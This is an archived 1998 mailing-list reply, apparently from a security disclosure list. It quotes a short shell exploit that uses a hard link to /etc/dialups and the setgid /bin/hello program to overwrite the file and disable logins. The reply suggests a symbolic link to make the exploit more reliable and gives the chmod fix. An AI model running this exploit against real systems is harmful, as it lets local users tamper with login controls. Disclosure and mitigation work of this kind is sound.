On Thu, 10 Sep 1998, Leshka wrote: > tty=`tty`;ttyfile=`pwd`/`basename $tty` > echo "Press any letter key 240 times (3 lines of text) then <CTRL>-D to > disable" > echo "login or just type <CTRL>-D to login enable. Sorry for the manual > work." > ln /etc/dialups $ttyfile;hello leshka ..$ttyfile;rm -f $ttyfile The exploit fails if your CWD is not in the same file system as /etc. Using a symbolic rather than a hard link fixes that. The exploit can be defeated with: # chmod g-s /bin/hello -- John W. Temples, III || Providing the first public access Internet Gulfnet Kuwait || site in the Arabian Gulf region
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:16:10 PDT